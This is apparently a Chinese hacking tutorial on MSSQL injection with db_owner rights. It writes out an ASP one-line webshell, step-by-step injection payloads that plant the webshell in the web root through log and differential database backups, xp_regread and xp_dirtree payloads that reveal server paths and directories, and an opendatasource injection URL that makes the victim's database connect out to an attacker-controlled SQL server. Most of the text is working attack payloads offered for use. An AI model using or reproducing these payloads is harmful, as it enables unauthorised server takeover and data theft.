備分專用一句話

備分專用一句話

<%eval(request("a")):response.end%> 備分專用一句話
加個response.end會有不一樣的效果,也就是插入一句話後所有的代碼都無效,在一句話這裏打止,也就減小了webshell的大小.

日誌備分WEBSHELL標準的七步:

1.InjectionURL';alter database XXX set RECOVERY FULL-- (把SQL設置成日誌完全恢復模式)

2.InjectionURL';create table cmd (a image)-- (新建立一個cmd表)

3.InjectionURL';backup log XXX to disk = 'c:/cmd' with init-- (減少備分數據的大小)

4.InjectionURL';insert into cmd (a) values ('<%%25eval(request("a")):response.end%%25>')-- (插入一句話木馬)

5.InjectionURL';backup log XXX to disk = 'd:/chinakm/test.asp'-- (備分日誌到WEB路徑）

6.InjectionURL';drop table cmd-- （刪除新建的cmd表）

7.InjectionURL';alter database XXX set RECOVERY SIMPLE--(把SQL設置成日誌簡單恢復模式)

注：InjectionURL是注入點，XXX是數據庫名稱.

附上DB_ONER權限HACK的其他技巧,希望對菜菜有所幫助,高手略過.

數據庫差異備份代碼：

1、create table [dbo].[jm_tmp] ([cmd] [image])-- 創建一個表

2、 declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0X6A006D00640063007700 backup database @a to disk = @s --備份數據庫，@s爲備份名稱(jmdcw的16進制轉換)

3、insert into [jm_tmp](cmd) values(0x3C2565786563757465287265717565737428226C222929253E)--將一句話木馬 "<%execute(request("l"))%>"的16進制字符插入到表中

4、declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s='C:/Program Files/Common Files/Microsoft Shared/Web Server Extensions/40/isapi/hsqq.asp' backup database @a to disk = @s WITH DIFFERENTIAL,FORMAT --對數據庫實行差異備份，備份的保存路徑暫定爲C盤目錄，文件名爲hsqq.asp。

5、drop table [jm_tmp]-- 刪除此表。

網站物理路徑讀取代碼：

1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 創建表

2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/ControlSet001/Services/W3SVC/Parameters/Virtual Roots','/'-- 將網站目錄插到表字段中

3、and (select top 1 cast([data] as nvarchar(4000)+char(124) from [jm_tmp] order by [data] desc)=0 '//暴出字段

4、drop table [jm_tmp]-- 刪除此表。

磁盤目錄讀取代碼：

1、drop table [jm_tmp];create table [jm_tmp](subdirectory nvarchar(400) NULL,depth tinyint NULL,[file] bit NULL)-- 創建表

2、delete [jm_tmp];insert [jm_tmp] exec master..xp_dirtree 'C:/',1,1-- 將C盤的文件夾及文件插入到表中

3、 and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) From(select Top 1 [subdirectory],[file] From [jm_tmp] orDER BY [file],[subdirectory]) T orDER BY [file] desc,[subdirectory] desc) '//暴出第一個文件夾名稱

4、and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) From(select Top 2 [subdirectory],[file] From [jm_tmp] orDER BY [file],[subdirectory]) T orDER BY [file] desc,[subdirectory] desc) '//暴出第二個文件夾名稱

5、and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) From(select Top X [subdirectory],[file] From [jm_tmp] orDER BY [file],[subdirectory]) T orDER BY [file] desc,[subdirectory] desc) '//暴出第X個文件夾或文件名稱

6、drop table [jm_tmp]--刪除此表

網站物理路徑讀取代碼：

1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 創建表

2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/ControlSet001/Services/W3SVC/Parameters/Virtual Roots','/'-- 將網站目錄插到表字段中

3、and (select top 1 cast([data] as nvarchar(4000)+char(124) from [jm_tmp] order by [data] desc)=0 '//暴出字段

4、drop table [jm_tmp]-- 刪除此表。

注射過程中DB_ONER權限並且主機與數據庫不在一起的搞法

其實.即使數據庫和WEB不在一塊還是有機會搞的.並不是說一點機會沒.一般服務器裝好系統什麼的.都會裝個IIS吧？列他C盤.看看有沒有Inetpub 這個目錄.就知道他有沒有裝IIS了.但是.不知道他IP也？怎麼辦呢？可以這樣來，PING一下WEB服務器.掃他這一C段的1433端口.看看哪臺開了.不過這方法也不好.現在很多主機都啓用了防火牆.1433端口就算開了你也掃不着.這該怎麼辦呢？可以利用opendatasource宏讓對方的 SQL與自己的數據庫建立連接.既然能建立連接.就可以得到數據庫服務器的IP地址了.我們來試試看.有幾個前提得說一下.第一.你機器必須要有公網 IP.而且開放的1433端口要保證能被外網訪問到.好.條件滿足.就開始做吧！

我現在搞的這站.100%數據和WEB不在一塊.但是從C盤看到了Inetpub文件夾.說明這數據庫服務器安裝了IIS.但是得不到他IP呀.怎麼搞哦.簡單.就用上面所說的方法搞一下.先在本機建個庫先.打開查詢分析器輸入
create database hack520 create TABLE zhu(name nvarchar(256) null);create TABLE J8(id int NULL,name nvarchar(256) null); 點執行.

建立了一個hack520的庫名.和zhu J8兩個表.zhu裏面有name這一個字段.J8也放了兩字段名.一個是id一個是name.好了.現在就可以開始建立連接了~~~~~~~先看一下這條SQL語句insert into opendatasource('sqloledb','server=你的IP;uid=SQL用戶;pwd=SQL密碼;database=建立的庫名') .庫名.表名 '執行的語句' 恩現在開始吧...

http://www.xxx.com/news.as... ... asource('sqloledb','server=219.149.xx.182;uid=sa;pwd=hack520!@#77169;database=hack520').hack520.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases--

在IE上執行咯.呵呵這個時候對方就會連接到我機器的SQL服務器.不信？netstat -an看一下

在CMD下輸入命令：
netstat -an | find "1433"